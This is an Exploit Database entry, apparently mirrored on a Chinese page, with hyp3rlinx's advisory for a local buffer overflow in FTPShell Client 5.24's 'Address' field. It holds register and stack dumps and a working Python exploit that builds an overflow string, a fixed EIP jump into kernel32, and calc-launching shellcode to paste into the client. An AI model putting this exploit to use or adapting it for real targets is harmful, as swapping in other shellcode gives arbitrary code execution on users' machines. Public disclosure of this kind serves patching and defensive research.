FTPShell Client 5.24 – Local Buffer Overflow

• Exploit Database
• 111 阅读

• 作者： hyp3rlinx
  日期： 2015-12-30
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/39132/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177

  &apos;&apos;&apos; [+] Credits: hyp3rlinx   [+] Website: hyp3rlinx.altervista.org   [+] Source: http://hyp3rlinx.altervista.org/advisories/FTPSHELL-v5.24-BUFFER-OVERFLOW.txt     Vendor: ================================ www.ftpshell.com     Product: ================================ FTPShell Client version 5.24   FTPShell client is a windows file transfer program that enables users to reliably transfer files, upload to websites, and download updates from the internet.     Vulnerability Type: =================== Buffer Overflow     CVE Reference: ============== N/A     Vulnerability Details: ===================== ftpshell.exe client has a buffer overflow entry point in the &apos;Address&apos; input field used to connect to an FTP server. Allowing local arbitrary code execution by overwriting several registers on the stack and controlling program execution flow. EIP register will be used to jump to our malicious shellcode which will be patiently waiting in ECX register.   exploited registers dump...   EAX 00000021 ECX 0012E5B0 EDX 76F670B4 ntdll.KiFastSystemCallRet EBX 76244FC4 kernel32.76244FC4 ESP 0012E658 ASCII "calc.exe" <--------- BAM! EBP 7621E5FD kernel32.WinExec ESI 001D2930 EDI 76244FEC kernel32.76244FEC EIP 015FB945 C 0ES 0023 32bit 0(FFFFFFFF) P 1CS 001B 32bit 0(FFFFFFFF) A 0SS 0023 32bit 0(FFFFFFFF) Z 1DS 0023 32bit 0(FFFFFFFF) S 0FS 003B 32bit 7FFDE000(FFF) T 0GS 0000 NULL D 0 O 0LastErr ERROR_SUCCESS (00000000) EFL 00200246 (NO,NB,E,BE,NS,PE,GE,LE) ST0 empty g ST1 empty g ST2 empty g ST3 empty g ST4 empty g ST5 empty g ST6 empty g ST7 empty g 3 2 1 0E S P U O Z D I FST C5E1Cond 1 1 0 1Err 1 1 1 0 0 0 0 1(Unordered) FCW 1372Prec NEAR,64Mask1 1 0 0 1 0     test stack dump....   (3b8.fa0): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** WARNING: Unable to verify checksum for ftpshell.exe *** ERROR: Symbol file could not be found.Defaulted to export symbols for ftpshell.exe - eax=41414141 ebx=017ebc70 ecx=017ebc70 edx=0012ebc8 esi=0012ebc8 edi=017a9498 eip=41414141 esp=0012e928 ebp=0012ea70 iopl=0 nv up ei pl nz na po nc cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00210202 41414141 ?????     Exploit code(s): =============== &apos;&apos;&apos;   import struct   #FTPShell Client version 5.24 - www.ftpshell.com #Buffer Overflow Exploit #by hyp3rlinx #run to generate payload, then copy and inject #into the &apos;Address&apos; field on the client and BOOM!   #shellcode to pop calc.exe Windows 7 SP1 sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B" "\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B" "\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31" "\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA" "\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14" "\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65" "\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")     #payload="A"*2475+"R"*4+"\xcc"*100#<---- control EIP register   #find appropriate assembly instruction to call our payload JMP or CALL ECX. #!mona jmp -r ecx -m kernel32.dll   eip=struct.pack(&apos;<L&apos;, 0x761C1FDC)#jmp ecx kernel32.dll payload="A"*2475+eip+sc#<----- direct EIP overwrite no NOPs no nothing... BOOOOOM!!!   file=open("C:\\ftpshell-exploit","w") file.write(payload) file.close()     &apos;&apos;&apos; Disclosure Timeline: ======================================== Vendor Notification:NR December 29, 2015: Public Disclosure       Exploitation Technique: ======================= Local       Severity Level: ================ High       Description: ==========================================================     Request Method(s):[+]Local Injection     Vulnerable Product: [+]FTPShell Client version 5.24     Vulnerable Parameter(s):[+] &apos;Address&apos;       ===========================================================   [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.   by hyp3rlinx &apos;&apos;&apos;